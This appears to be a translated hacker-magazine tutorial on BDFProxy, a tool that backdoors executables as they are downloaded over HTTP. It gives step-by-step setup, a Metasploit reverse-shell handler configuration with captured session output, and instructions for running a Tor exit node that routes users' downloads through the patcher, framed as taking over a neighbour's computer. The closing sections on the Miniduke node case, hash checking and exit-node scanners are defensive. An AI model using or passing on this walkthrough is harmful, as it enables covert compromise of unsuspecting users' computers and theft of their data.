I guess you have heard about the Evilgrade framework, which lets you “fix” the update mechanism of the most popular programs (Windows update, Apple update and so on) by replacing valid files with malicious ones. You probably think that only application updates are vulnerable? Well, you are wrong. To be honest with you, downloading files from the web is not as secure as it might seem at first sight. Don’t believe me? Then look, or rather, read.
Instead of introduction
Penetrating an ordinary user’s workstation is quite a complicated task. Unlike servers, where a large amount of additional software (web servers, DBMS, FTP servers…) increases the chances of finding a way to get a remote shell, an ordinary workstation barely gives us a foothold. Let’s say you would like to get remote access to your neighbour Vasya’s computer. And our absent-minded Vasya has forgotten to turn off automatic system updates, so there is no way to get in using some old-fashioned exploit. So the situation is not easy, but it is not a dead end either. Here we can count on our social engineering skills or, for example, use Evilgrade, as long as Vasya has his auto updates turned on! But there is another way as well – BDFProxy.
BDFProxy is a tool that grew out of two different instruments. Initially, the author of BDFProxy, Joshua Pitts, created a tool called The Backdoor Factory, designed to automate the patching of files in order to insert backdoor code, which can be quite crucial for penetration testing. The other one, mitmproxy, is a Python proxy server that can intercept HTTP, change traffic on the fly, replay traffic, and decode and render primitive data types. Crossing those two tools gave us BDFProxy. How does it work? The tool patches, on the fly, the binaries being downloaded by a victim. And now just imagine how many official websites distribute their programs via HTTP. Moreover, a lot of quite big names, like Sysinternals, Microsoft, Malwarebytes, SourceForge, Wireshark, as well as a great number of antivirus companies, do that. And while most antivirus products can detect damage to their integrity, regular software is not equipped with such functions, which means that its modification goes unnoticed by the user.
Let’s drop all the irrelevant stuff and check what this tool is capable of. First and foremost, we need the following packages: up-to-date versions of Pefile, ConfigObj, mitmproxy, BDF (also the latest one) and Capstone (part of BDF). So, we need to clone BDFProxy into a folder of the same name and launch the installation:
git clone https://github.com/secretsquirrel/BDFProxy
cd BDFProxy/
./install.sh
Then we just sit and wait. However, if you do not have ‘pip’ installed on your computer, you will need to install the pefile library manually:
wget https://pefile.googlecode.com/files/pefile-1.2.10-139.tar.gz
tar -zxvf pefile-1.2.10-139.tar.gz
cd pefile-1.2.10-139
python setup.py install
Thus, everything is ready to use. According to the author, before every launch we should run the update command in case there have been changes and updates:
So, here we come to the most interesting part, the configuration, which lives in the bdfproxy.cfg file. Let’s check what we have there. Besides the proxy port (proxyPort = 8080), the log file (logname = proxy.log) and the log level (loglevel = INFO), we find whitelists and blacklists there. Whitelisted items are patched, blacklisted ones are not. These lists exist both for hosts, where we state from which servers binaries should be patched and from which not (the default, ALL, means that all binaries will be patched), and for keywords, where the blacklist holds everything that should not be patched. For example, executable files of popular programs and DLL libraries:
blacklist = Tcpview.exe, skype.exe, .dll
The configuration also allows adjusting the settings for every type of executable file for Windows/Linux x86/x64. Well, that’s enough about configuration: everything about it is quite simple and understandable, so let’s proceed to action.
Now that we have everything installed, we can finally launch our tool and hack ourselves in the best possible way. Run the tool:
We get the following response:
[!] Writing resource script.
[!] Resource writen to bdfproxy_msf_resource.rc
[!] Starting BDFProxy
As we can see, a new file has appeared: bdfproxy_msf_resource.rc. Inside it we can find how to use it:
msfconsole -r bdfproxy_msf_resource.rc
You have probably already understood that msfconsole is the most popular MSF interface. It is a kind of “all in one” solution: the console is centralised and provides access to almost every option available in the Metasploit Framework. At first sight msfconsole may seem slightly confusing and not really clear; however, once you start to understand the command syntax, you begin to appreciate how effective the interface is. Returning to our console, we complete the set-up:
msf > use multi/handler
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 8443
LPORT => 8443
msf exploit(handler) > exploit -z -j
Now, when some binary is downloaded from the web, it is going to be patched on the fly and, at the same time, it will be quite difficult for antivirus programs to detect it. Plus, after it is launched we have a fully featured shell on the remote computer. All that is left is to connect to it and rule it at your own pleasure:
msf exploit(handler) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ---------
1 shell windows 192.168.0.1:8443 -> 192.168.0.109:11162
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…
Microsoft Windows Copyright (c) 2009 Microsoft Corporation.
Test in service
Well, in order to run such an attack in real conditions, it is necessary to put BDFProxy between a victim and the global or local network. There are several ways to run MITM, and which one to choose depends on the situation. As for us, we are going to use BDFProxy and Tor “in cahoots” instead of running ARP spoofing or DNS cache poisoning. As you may remember, it is the exit node that gets to see the “pure” traffic, so nothing stops us from sending it through the Backdoor Factory Proxy in order to modify the executable files being downloaded by users.
As the launch pad we are going to use Kali Linux; however, any other distribution will do. If you still do not have Tor installed on your computer, it is time to install it:
apt-get install tor
So, we are ready to set it up.
Setting up the Tor
First, we need to understand which configuration parameters we will need.
ControlPort – the port on which Tor accepts connections for controlling the Tor server.
DirPort – the port on which Tor receives data from the directory server.
Let’s set them, for example, like this:
ControlPort 9051
DirPort 9030
ExitPolicy – determines which traffic is going to be accepted or forwarded. It has the following format: ExitPolicy accept | reject address:port. We can use something like this:
ExitPolicy accept *:80
ExitPolicy accept *:443
ExitPolicy accept *:110
ExitPolicy accept *:143
ExitPolicy accept *:993
ExitPolicy accept *:995
ExitPolicy reject *:*
This way we cut off all traffic except for the following ports: 80, 443, 110, 143, 993 and 995. You can add or remove ports as you wish. As the saying goes, a man is the king in his house.
HashedControlPassword – the hash of the password used to access and configure the Tor server. It can be generated using this command:
Nickname – the name of our server.
ORPort – the port receiving connections from other nodes.
SocksListenAddress – the address that Tor will use to receive connections from SOCKS-based applications. Format: SocksListenAddress IP[:PORT]. Let’s set the IP to 127.0.0.1 and leave the port at its default (9050). We need this setting if we are going to use Tor in combination with Privoxy or other proxies.
The final part of the configuration will look something like this:
HashedControlPassword 16:91495A0B7CBC41C76073E1EC00A5CF1510D41462884391CCB24BF489F1
# Print messages to the console
Log notice stdout
Nickname BDFProxy
ORPort 9001
SocksListenAddress 127.0.0.1
Now, let’s run Tor:
tor -f /home/toruser/.tor/torrc
After a little while our computer becomes a full-featured exit node! By the way, I highly recommend creating a separate user to run Tor instead of launching it as root.
Well, we are not satisfied with what has been achieved so far. I hope you have not forgotten why we have been doing all that. All that is left to do is to forward the incoming traffic to our BDFProxy and watch for new sessions appearing in Metasploit, which will mean that the patched binary has been successfully launched by a victim. In order to do that we will use iptables:
iptables -t nat -A PREROUTING -p tcp --sport 80 -j DNAT --to-destination 127.0.0.1:8080
Since Tor does not work perfectly yet and gets the shakes from time to time, we have given you a not really correct (or rather, not correct at all ;)) rule for the packet filter, so that your experiments will not destroy the whole project. However, if you want to get down to brass tacks, your homework is to find out how to correct all the screwups.
A case of binary modification
I guess you have already heard that the experts from the Leviathan Security Group found a malicious Tor node in Russia. After the disclosure, the researchers tried to imitate such an attack. When a modified package is downloaded through Windows Update, the system throws error 0x80200053. This code points to a problem with the signature check of the downloaded binary. However, if we google the solution to this problem and follow the very first link, we land on the official Microsoft site, where we find instructions for repairing the error together with a link to a patch. The catch is that the patch is modified as well, and since it is installed separately rather than through the Auto Update service, its integrity is not checked. Need I explain the scale and possibilities of such nodes?
By now the malicious node has been reported to Tor and marked as BadExit. Nevertheless, we should mention that among the 1110 exit nodes in the Tor network only this one added malicious code to binaries. The rest of the nodes have been checked and they do not do anything similar. We cannot be 100% sure, though, since nodes could act selectively and modify only a part of the files in order not to be detected during the check. Incidentally, Symantec added its two cents on the malicious node. The virus that was added to the binaries was designed for the following systems: Windows XP, Windows 2000, Windows Vista and Windows 7. Antivirus detects it as Backdoor.Miniduke!GEN4. After penetration the program contacts its creators via the Twitter microblog, searching for tweets in accounts that the hackers had created in advance. Using the links in them, it downloads the core part of the code. So the upload is performed in several stages, after which the malicious code starts to act as a backdoor, giving the hacker access to all the data on the victim’s computer.
How to protect yourself
Well, and now a couple of words about countermeasures.
The most banal and effective measure in this situation is to use SSL/TLS. But how do you make the owners of the sites you download files from use it? Another way is to compare the hash of the genuine file with that of the one you have downloaded. If you still have any suspicions, you can use VirusTotal or similar resources: if code with any known signature has been added, you will get a pile of virus detections.
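The hash comparison described above, as an added example that is not part of the original article: it checks a download against a published SHA-256 and, when a known-good copy is at hand, reports which PE header fields changed. Comparing the entry point and section count is an assumption about where inserted code would show up, and the sample images are constructed header stubs, not real programs.

```python
import hashlib
import hmac
import struct

def pe_summary(data: bytes) -> dict:
    """Size, section count and entry point read from the PE headers."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ/PE image")
    pe = struct.unpack_from("<I", data, 0x3C)[0]        # e_lfanew
    if len(data) < pe + 44 or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return {
        "size": len(data),
        "sections": struct.unpack_from("<H", data, pe + 6)[0],      # NumberOfSections
        "entry_point": struct.unpack_from("<I", data, pe + 40)[0],  # AddressOfEntryPoint
    }

def check_download(data: bytes, published_sha256: str, reference: bytes = None):
    """Return (ok, findings). The hash decides; the header diff is triage only."""
    actual = hashlib.sha256(data).hexdigest()
    ok = hmac.compare_digest(actual, published_sha256.strip().lower())
    findings = []
    if not ok:
        findings.append("sha256 mismatch: " + actual)
        if reference is not None:
            try:
                ref, got = pe_summary(reference), pe_summary(data)
                findings += [f"{k}: {ref[k]} -> {got[k]}" for k in ref if ref[k] != got[k]]
            except ValueError as err:   # e.g. an HTML error page instead of a binary
                findings.append(f"header comparison skipped: {err}")
    return ok, findings

def make_sample_pe(entry_point: int, sections: int, body: bytes) -> bytes:
    """Constructed minimal header set for the demo, not a loadable program."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, sections, 0, 0, 0, 0xE0, 0x102)
    opt = struct.pack("<HBBIII", 0x10B, 0, 0, 0, 0, 0) + struct.pack("<I", entry_point)
    return dos + b"PE\0\0" + coff + opt + body

if __name__ == "__main__":
    original = make_sample_pe(0x1000, 3, b"A" * 64)
    tampered = make_sample_pe(0x5000, 4, b"A" * 64 + b"B" * 32)
    published = hashlib.sha256(original).hexdigest()
    print(check_download(original, published))
    print(check_download(tampered, published, reference=original))
```

The published hash has to come from a channel the proxy cannot rewrite, otherwise the comparison proves nothing.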
How to check a Tor node
To check an exit node you can use a special tool called exitmap, a fast, extensible scanner for exit nodes written in Python and quite a useful tool for monitoring the safety and authenticity of exit nodes. I also recommend the patchingCheck.py script, which nicely detects modifications of binaries and tells us immediately if it finds anything. If you do not like exitmap, have a look at torscanner, which works on quite a simple principle: it just downloads different links from the web and compares them with what it gets through a Tor exit node, and in case of a mismatch it “raises hell”. Besides, we should have a look at DetecTor, designed to fight MITM in Tor networks.
Tor is a great tool for protection; however, it cannot guarantee safety, and we should not forget about this. As you can see, the core idea is quite clear: do not trust anybody and check the data you receive, since you never know what exactly you have downloaded in a “piping hot” binary. Setting all this up on your own server is not a big deal; moreover, if your target is the market of applications and software, then the chances of being caught are not too high. So, honour the Criminal Code of the Russian Federation, wear a white hat and always check your hashes.
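The comparison principle described for torscanner, as an added example that is not code from torscanner, exitmap or the original article: it fetches each file directly and through every exit over several rounds, because a node that modifies only some files can pass a single check. The fetch functions, exit names and URLs are constructed stand-ins; a real check would plug in its own fetchers.

```python
import hashlib
from collections import defaultdict

def compare_paths(urls, exits, fetch_direct, fetch_via_exit, rounds=3):
    """Map each exit to the (url, round) pairs where its copy differed from the direct one."""
    baseline = {u: hashlib.sha256(fetch_direct(u)).hexdigest() for u in urls}
    suspects = defaultdict(list)
    for exit_id in exits:
        for rnd in range(rounds):
            for url in urls:
                try:
                    body = fetch_via_exit(exit_id, url)
                except OSError:
                    continue  # an unreachable exit is not evidence of tampering
                if hashlib.sha256(body).hexdigest() != baseline[url]:
                    suspects[exit_id].append((url, rnd))
    return dict(suspects)

# Constructed stand-ins for the network; no real host or relay is contacted.
FILES = {
    "http://downloads.example.test/tool.exe": b"MZ original bytes",
    "http://downloads.example.test/readme.txt": b"plain text",
}

def fake_direct(url):
    return FILES[url]

class FakeExits:
    """Hypothetical relays: exitA is honest, exitB alters every second .exe it serves."""
    def __init__(self):
        self.exe_count = 0

    def fetch(self, exit_id, url):
        if exit_id == "exitB" and url.endswith(".exe"):
            self.exe_count += 1
            if self.exe_count % 2 == 0:
                return FILES[url] + b" plus inserted bytes"
        return FILES[url]

def run_demo(rounds):
    return compare_paths(list(FILES), ["exitA", "exitB"], fake_direct,
                         FakeExits().fetch, rounds)

if __name__ == "__main__":
    print("1 round :", run_demo(1))   # the selective relay slips through
    print("4 rounds:", run_demo(4))
```

Use static files only for such a check, since content that legitimately differs per request would be reported as a mismatch.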